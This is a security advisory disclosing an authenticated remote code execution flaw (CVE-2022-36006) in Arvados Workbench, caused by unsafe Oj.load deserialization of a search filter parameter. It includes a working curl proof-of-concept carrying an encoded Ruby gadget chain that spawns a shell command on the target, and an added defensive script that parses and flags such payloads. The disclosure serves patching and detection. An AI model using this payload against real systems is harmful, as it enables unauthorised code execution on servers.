Coordinated Disclosure Timeline
- 2022-08-03: Sent report to Arvados maintainers
- 2022-08-03: Arvados maintainers acknowledged receiving the report
- 2022-08-12: Advisory was published
Summary
A remote code execution (RCE) vulnerability in the Arvados Workbench allowed authenticated attackers to execute arbitrary code via specially crafted JSON payloads.
Product
Arvados Workbench
Tested Version
Details
Issue: Authenticated remote code execution due to insecure deserialization (GHSL-2022-063)
The Arvados Workbench uses Oj for deserializing JSON payloads from remote sources. When Oj.load is called without a restricting mode (its default mode is :object), arbitrary Ruby objects can be deserialized. Deserializing untrusted data with any method that allows the construction of arbitrary objects is easily exploitable and, in many cases, lets an attacker execute arbitrary code. So-called “gadget chains” that allow code execution exist for all versions of Ruby.
The Arvados Workbench exposes a search endpoint which uses Oj.load to deserialize a JSON-based filters query parameter. Authenticated attackers able to send arbitrary requests to this endpoint can achieve remote code execution (RCE). The same is likely true for the combine_selected_files_into_collection action inside actions_controller.rb.
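As an added illustration (this is not code from the advisory or from Arvados), the following Ruby decodes the filters parameter of the PoC request below with a parser that can only ever produce plain Hashes, Arrays and scalars, and then lists the classes that an unrestricted Oj.load (object mode) would have resolved from the "^o" and "^c" markers. The helper names, the benign filter document used for comparison and the main section are constructed for this example; the encoded payload itself is the one from the advisory.

```ruby
# frozen_string_literal: true
require 'json'
require 'cgi'

# The URL-encoded value of the "filters" query parameter from the PoC request,
# split into adjacent literals only for readability (copied from the advisory).
ENCODED_FILTERS =
  '%7B%22%5E%231%22%3A%5B%5B%7B%22%5Ec%22%3A%22Gem%3A%3ASpecFetcher%22%7D%2C' \
  '%7B%22%5Ec%22%3A%22Gem%3A%3AInstaller%22%7D%2C' \
  '%7B%22%5Eo%22%3A%22Gem%3A%3ARequirement%22%2C%22requirements%22%3A' \
  '%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%22%2C%22io%22%3A' \
  '%7B%22%5Eo%22%3A%22Net%3A%3ABufferedIO%22%2C%22io%22%3A' \
  '%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%3A%3AEntry%22%2C%22read%22%3A0%2C%22header%22%3A%22any%22%7D%2C' \
  '%22debug%5Foutput%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A' \
  '%7B%22%5Eo%22%3A%22Gem%3A%3ARequestSet%22%2C%22sets%22%3A' \
  '%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Ec%22%3A%22Kernel%22%7D%2C' \
  '%22method%5Fid%22%3A%22%3Aspawn%22%7D%2C' \
  '%22git%5Fset%22%3A%22date%20%3E%3E%20%2Ftmp%2Fpwned%2Etxt%22%7D%2C' \
  '%22method%5Fid%22%3A%22%3Aresolve%22%7D%7D%7D%7D%5D%2C%22any%22%5D%7D'

# Constructed benign input: an ordinary Arvados-style filter triple, for comparison.
BENIGN_FILTERS = CGI.escape('[["name","=","example"]]')

# Hardened parsing of the parameter: JSON.parse (stdlib) knows nothing about Oj's
# "^o"/"^c"/"^#n" conventions, so those keys stay inert strings. With Oj the
# equivalent is Oj.load(str, mode: :strict) (or Oj.strict_load); what must never
# run on this input is a bare Oj.load(str), which defaults to object mode.
def parse_filters(encoded)
  JSON.parse(CGI.unescape(encoded))
end

# Walk an already-parsed tree and collect, in document order, every class name
# that Oj's object mode would have instantiated ("^o") or resolved ("^c").
# A "^#n" key marks a hash entry whose key is itself a non-String value encoded
# as a [key, value] pair, which is how the chain here is wrapped.
def oj_classes_in(tree, acc = [])
  case tree
  when Hash
    tree.each do |k, v|
      acc << v if (k == '^o' || k == '^c') && v.is_a?(String)
      oj_classes_in(v, acc)
    end
  when Array
    tree.each { |v| oj_classes_in(v, acc) }
  end
  acc
end

# Triage helper: does a filters document carry object-mode markers at all?
# Useful both for log review and as a guard in front of any legacy Oj.load call.
def suspicious_filters?(encoded)
  !oj_classes_in(parse_filters(encoded)).empty?
end

if $PROGRAM_NAME == __FILE__
  tree = parse_filters(ENCODED_FILTERS)
  puts "Top-level type after JSON.parse: #{tree.class}" # a plain Hash, no objects built
  puts 'Classes an unrestricted Oj.load would have resolved:'
  oj_classes_in(tree).each { |c| puts "  #{c}" }
  puts "Benign filter flagged? #{suspicious_filters?(BENIGN_FILTERS)}"
end
```

Running the script against the PoC parameter prints the ten class references of the gadget chain (Gem::SpecFetcher through Kernel) without any of them being instantiated, because the parser never leaves the JSON data model; the same walk over a normal filter triple finds nothing.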
This vulnerability was found using a CodeQL query which identifies deserialization of user-controlled data.
Proof of concept (for Ruby 2.x)
The search endpoint can be attacked with the following deserialization gadget chain, which creates (or appends to) the file /tmp/pwned.txt on the attacked Arvados system (the test was performed against a setup as described on the Arvados-in-a-box page):
curl -i -s -k -X $'GET' \
-H $'Host: 172.17.0.2' -H $'Accept: application/json' -H $'X-Csrf-Token: [..]' \
-b $'_arvados_workbench_session=[..]' \
$'https://172.17.0.2/search/choose?partial=true&filters=%7B%22%5E%231%22%3A%5B%5B%7B%22%5Ec%22%3A%22Gem%3A%3ASpecFetcher%22%7D%2C%7B%22%5Ec%22%3A%22Gem%3A%3AInstaller%22%7D%2C%7B%22%5Eo%22%3A%22Gem%3A%3ARequirement%22%2C%22requirements%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Net%3A%3ABufferedIO%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%3A%3AEntry%22%2C%22read%22%3A0%2C%22header%22%3A%22any%22%7D%2C%22debug%5Foutput%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3ARequestSet%22%2C%22sets%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Ec%22%3A%22Kernel%22%7D%2C%22method%5Fid%22%3A%22%3Aspawn%22%7D%2C%22git%5Fset%22%3A%22date%20%3E%3E%20%2Ftmp%2Fpwned%2Etxt%22%7D%2C%22method%5Fid%22%3A%22%3Aresolve%22%7D%7D%7D%7D%5D%2C%22any%22%5D%7D'
(Hint: replace the X-Csrf-Token header and the _arvados_workbench_session cookie with valid, authenticated values.)
Please note:
- The above payload for Ruby 2.x is based on a gadget chain for Marshal.load originally discovered by William Bowling aka vakzz.
- A payload for Oj.load such as the one above can be found in this blog post from Bishop Fox.
- We are in possession of an undisclosed Oj.load payload for Ruby 3.x that is based on the newest Marshal.load gadget chain from William Bowling.
Impact
This issue may lead to Remote Code Execution (RCE).
CVE
- CVE-2022-36006
Credit
This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-063 in any communication regarding this issue.